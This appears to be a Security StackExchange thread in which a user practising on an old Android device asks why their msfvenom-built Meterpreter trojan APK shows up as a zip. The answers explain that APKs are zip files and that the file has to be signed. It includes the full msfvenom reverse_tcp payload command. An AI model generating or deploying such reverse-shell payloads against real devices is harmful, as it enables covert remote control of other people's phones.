# Metasploit creating .ZIP files instead of .APK files?

Tags: android, metasploit, zip

I have been practicing using an old Android device and Kali Linux. I set up the trojan .apk file like normal, using the command

```
msfvenom -p android/meterpreter/reverse_tcp LHOST=MyIP LPORT=RandomPort R> /root/Android.apk
```

It created an .apk at first, but when the process finished, it gave me a .zip file with manifests and application signatures.

Is there something I am doing wrong when I am creating this file? Or is there a way to convert these .zip files to .apk files?

Comment: It's not really clear what you are asking. Every apk is a zip file. How did you determine that your file is  not a apk but a zip file?

Comment: Also: Are you sure that you don't have a default program associated with the extension? ie - 7zip automatically opens the apk and you assume that it's a zip archive. Also, simply try changing the extension and install.

Comment: On my desktop it came up as a zip file. I also know its not a apk file becauss I tried to install it on my device. Its came up with an error stating that the application cannot be installed

Comment: I never taught about the defaults. I will look into that ASAP

Answer (score 3, accepted):

The command is ok and apk file is created.

An apk file really is a zip file with the extension changed (as @Josef said in comments), so your problem is other. Maybe you have apk files associated in your O.S. to a program which usually open zip files and that's because you are thinking is a zip file but it is an apk file. Checkout that!

**EDIT** Look at [this](https://security.stackexchange.com/questions/104303/msfvenom-payload-problem). Try to sign your file.

Comment: So will the apk files have things like a META-INF folder and so on?

Comment: Now that I think about it. I think that the problem is that the .apk is not signed, so that may be causing the problem

Comment: Could be... I edited my answer. Check it out!

Comment: Absolutely terrific! It worked! It turns out that the apk had to be signed, otherwise it would not work. Thank you so much! I cannot thank you enough!